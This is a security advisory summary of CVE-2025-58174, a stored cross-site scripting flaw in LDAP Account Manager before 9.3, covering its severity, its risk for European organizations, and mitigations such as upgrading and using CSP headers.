CVE-2025-58174 is a stored cross-site scripting (XSS) vulnerability affecting LDAP Account Manager (LAM) versions prior to 9.3. LAM is a web-based frontend used to manage LDAP directory entries. The vulnerability arises from improper neutralization of input during web page generation, specifically in the Profile section where the profile name field is rendered. An authenticated user with permissions to create or edit profiles can inject malicious script code into the profile name. This script is then executed in the browser context of any user viewing the profile data, leading to potential theft of session tokens, unauthorized actions, or other malicious activities typical of XSS attacks. The vulnerability is classified under CWE-79, indicating improper input sanitization. Exploitation requires authentication with profile editing rights and user interaction (viewing the profile), but no known exploits are currently reported in the wild. The CVSS v3.1 base score is 4.6 (medium severity), reflecting a network attack vector with low complexity, requiring privileges and user interaction, and impacting confidentiality and integrity but not availability. The issue is resolved in LAM version 9.3, with no known workarounds available for earlier versions.

For European organizations using LDAP Account Manager versions prior to 9.3, this vulnerability poses a moderate risk. Since LAM is often used in enterprise environments to manage user directories, exploitation could lead to unauthorized disclosure of sensitive information or session hijacking within internal administrative portals. This could facilitate further lateral movement or privilege escalation within the network. The requirement for authenticated access limits exposure to internal or trusted users, but insider threats or compromised accounts could exploit this vulnerability. Confidentiality and integrity of user data and administrative sessions are at risk, potentially impacting compliance with GDPR and other data protection regulations. The absence of availability impact reduces the risk of service disruption but does not diminish the threat to data security and trustworthiness of identity management processes.

European organizations should prioritize upgrading LDAP Account Manager to version 9.3 or later, where this vulnerability is fixed. Until upgrade is possible, organizations should restrict profile editing permissions strictly to trusted administrators and monitor for unusual profile changes or script injections. Implementing web application firewalls (WAFs) with rules to detect and block XSS payloads targeting LAM interfaces can provide temporary protection. Additionally, enforcing strong authentication and session management controls reduces the risk of compromised accounts being used to exploit this vulnerability. Security teams should conduct regular audits of LDAP profiles for suspicious content and educate administrators about the risks of injecting untrusted input. Finally, organizations should ensure that browsers accessing LAM interfaces have XSS protection enabled and consider Content Security Policy (CSP) headers to mitigate script execution risks.